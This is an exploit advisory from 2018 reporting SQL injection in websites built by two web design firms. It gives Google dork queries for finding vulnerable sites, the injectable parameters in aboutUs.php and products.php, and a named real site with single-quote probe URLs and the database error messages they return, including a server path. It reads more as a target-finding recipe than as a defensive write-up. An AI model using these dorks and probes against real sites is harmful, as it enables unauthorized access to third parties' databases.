#################################################################################################
# Exploit Title : Powered by Expert Web Worx and AnaghaSofTech SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 29/05/2018
# Vendor Homepages : expertwebworx.com / anaghasoftech.com
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89
#################################################################################################
# Google Dork : intext:''powered by : Expert Web Worx''
# Google Dork : inurl:''/aboutUs.php?id=''
# Google Dork : inurl:''/products.php?cid=''
# Exploit : /aboutUs.php?id=[SQL Injection]
# Exploit : /products.php?cid=[SQL Injection]
#################################################################################################
# Example Site => apbired.org/aboutUs.php?id=11%27 => [ Proof of Concept for SQL Injection ] => archive.is/qtNIN
# Example Site => apbired.org/products.php?cid=15%27 => [ Proof of Concept for SQL Injection ] => archive.is/gLl46
# Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
# Error : Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/apbired/public_html/products.php on line 110 and 116
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################